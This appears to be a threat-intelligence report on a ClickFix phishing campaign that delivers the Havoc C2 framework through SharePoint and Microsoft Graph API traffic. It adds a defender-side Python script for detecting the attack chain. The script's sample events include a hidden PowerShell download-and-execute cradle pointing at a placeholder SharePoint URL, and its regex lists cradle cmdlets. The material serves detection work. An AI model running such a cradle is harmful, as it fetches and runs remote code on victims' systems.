Full Report
Cybersecurity researchers are calling attention to a new phishing campaign that employs the ClickFix technique to deliver an open-source command-and-control (C2) framework called Havoc. "The threat actor hides each malware stage behind a SharePoint site and uses a modified version of Havoc Demon in conjunction with the Microsoft Graph API to obscure C2 communications within trusted, well-known
Analysis Summary
# Tool/Technique: Havoc C2 Framework (via ClickFix/SharePoint Delivery)
## Overview
A phishing campaign utilizing the **ClickFix technique** to deliver the **Havoc Command and Control (C2) framework**. The attacker deploys the stages of the attack behind legitimate-looking SharePoint sites, using the **Microsoft Graph API** to obfuscate C2 communications within trusted cloud services.
## Technical Details
- Type: Malware/C2 Framework (Havoc Demon agent) and Delivery Technique (ClickFix)
- Platform: Windows (PowerShell execution, Python dependency)
- Capabilities: C2 communication, information gathering, file operations, command/payload execution, token manipulation, Kerberos attacks.
- First Seen: The specific combination described here was reported in March 2025.
## MITRE ATT&CK Mapping
* **TA0001 - Initial Access**
  * T1566 - Phishing
    * T1566.001 - Spearphishing Attachment (Initial HTML attachment)
* **TA0002 - Execution**
  * T1059 - Command and Scripting Interpreter
    * T1059.001 - PowerShell
* **TA0011 - Command and Control**
  * T1071 - Application Layer Protocol
    * T1071.001 - Web Protocols (Leveraging Microsoft Graph API for obfuscation)
## Functionality
### Core Capabilities
The attack chain involves several stages:
1. **Initial Lure:** A phishing email delivers an HTML attachment (`Documents.html`).
2. **ClickFix Trigger:** The HTML attachment displays a fake error message that tricks the user into copying a malicious PowerShell command and running it in their terminal (the ClickFix technique).
3. **Download and Execution:** The PowerShell command downloads and executes a subsequent PowerShell script from an adversary-controlled SharePoint server.
4. **Sandboxing Check:** The downloaded script checks if it is running in a sandbox environment.
5. **Dependency Acquisition:** If no sandbox is detected, the script downloads the Python interpreter (`pythonw.exe`) to the victim host, if it is not already present, and executes it.
6. **Loader Execution:** A Python script is fetched, which serves as a shellcode loader. This loader is identified as **KaynLdr** (a reflective loader written in C and ASM).
7. **Payload Delivery:** KaynLdr launches an embedded DLL, which is the **Havoc Demon agent**.
### Advanced Features
* **C2 Obfuscation:** Havoc communications are concealed by routing traffic through the **Microsoft Graph API**, blending in with legitimate service traffic.
* **Reflective Loading:** Use of KaynLdr allows the Havoc DLL to be loaded directly into memory without dropping a traditional executable file.
* **Anti-Analysis:** The inline check for sandboxed environments prevents automated analysis.
## Indicators of Compromise
- File Hashes: *Not explicitly listed in the provided text.*
- File Names: `Documents.html`, `pythonw.exe` (downloaded dependency)
- Registry Keys: *Not explicitly listed in the provided text.*
- Network Indicators: SharePoint servers used for hosting stages (specific URLs are not provided, but the method relies on adversary-controlled SharePoint domains). Communications utilize the Microsoft Graph API endpoints.
- Behavioral Indicators: Execution of PowerShell scripts triggered by user input prompted by an HTML attachment; dynamic downloading of Python interpreter; use of KaynLdr reflective DLL loading; C2 beaconing utilizing the Microsoft Graph API structure.
## Associated Threat Actors
*The specific threat actor is not named in this summary text; the source refers only to "Hackers" or "The threat actor".*
## Detection Methods
- Signature-based detection: *Not detailed, but signatures could target the known KaynLdr shellcode or file contents.*
- Behavioral detection: Detecting unusual PowerShell execution chained from an HTML file interaction; monitoring for the download and execution of `pythonw.exe` in an atypical, automated manner; monitoring network traffic for beaconing patterns disguised as Microsoft Graph API calls.
- YARA rules: *Not detailed in the provided text.*
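As a defender-side illustration of the behavioral detections listed above, the following is an added example (not code from the original report or from the Havoc project) that runs three simple rules over a constructed, simplified process/network event log and then checks whether the whole ClickFix to PowerShell to dropped `pythonw.exe` to Graph API chain is present. The event field names, the host paths and the `contoso-files.sharepoint.com` URL are assumptions.

```python
"""Triage rules for the ClickFix -> PowerShell -> pythonw.exe -> Graph API chain.
Added example; the event schema below is a constructed, simplified telemetry
format, and every path, user and host name is a constructed placeholder."""
import re

# Constructed sample telemetry: one dict per event, field names are assumptions.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "irm https://contoso-files.sharepoint.com/s/x | iex"'},
    {"type": "process", "parent": "powershell.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\pythonw.exe", "cmdline": "pythonw.exe loader.py"},
    {"type": "network", "image": r"C:\Users\alice\AppData\Local\Temp\pythonw.exe",
     "dest": "graph.microsoft.com"},
    {"type": "process", "parent": "services.exe", "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    # Benign control: a properly installed interpreter talking to a package index must not fire.
    {"type": "network", "image": r"C:\Program Files\Python312\pythonw.exe", "dest": "pypi.org"},
]

# Download-and-execute cradle cmdlets/aliases commonly pasted by ClickFix lures.
CRADLE = re.compile(r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b", re.I)
# Paths a standard user can write to; a dropped interpreter lands here, an installed one does not.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(appdata|downloads|desktop)\\", re.I)
# ClickFix runs via Win+R or a user-opened terminal, so the parent is the interactive shell.
INTERACTIVE_PARENTS = {"explorer.exe"}

STAGES = ("clickfix_powershell_cradle", "python_from_user_writable_path",
          "graph_api_beacon_from_dropped_python")


def detect(events):
    """Return (rule_name, evidence) tuples for each event matching one of the three stage rules."""
    findings = []
    for e in events:
        image = e["image"].lower()
        if e["type"] == "process":
            if (image.endswith("powershell.exe") and e["parent"].lower() in INTERACTIVE_PARENTS
                    and CRADLE.search(e["cmdline"])):
                findings.append((STAGES[0], e["cmdline"]))
            if image.endswith("pythonw.exe") and USER_WRITABLE.search(e["image"]):
                findings.append((STAGES[1], e["image"]))
        elif e["type"] == "network":
            # Graph API traffic is normal for many apps, so scope to an interpreter in a dropped location.
            if (image.endswith("pythonw.exe") and USER_WRITABLE.search(e["image"])
                    and e["dest"].lower().endswith("graph.microsoft.com")):
                findings.append((STAGES[2], e["dest"]))
    return findings


def full_chain_present(findings):
    """True when all three stages fired, which warrants escalation over any single hit."""
    return set(STAGES) <= {name for name, _ in findings}
```

Any single rule alone is noisy (administrators paste cradles too); the chain check is what separates this campaign's shape from ordinary activity.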
## Mitigation Strategies
- Prevention measures: Restricting execution of downloaded scripts (e.g., via Application Control); tightly controlling macro/script execution from untrusted sources.
- Hardening recommendations: Implementing strong security policies for Microsoft 365/SharePoint to limit unauthorized external file hosting or access; deploying endpoint detection and response (EDR) capable of monitoring reflective loading techniques (like KaynLdr).
## Related Tools/Techniques
* **Havoc:** An open-source C2 framework known for its flexibility and evasion capabilities.
* **ClickFix Technique:** A social engineering method relying on users copying and pasting commands due to a perceived error message in an HTML rendering.
* **KaynLdr:** A specific reflective loader used in this chain.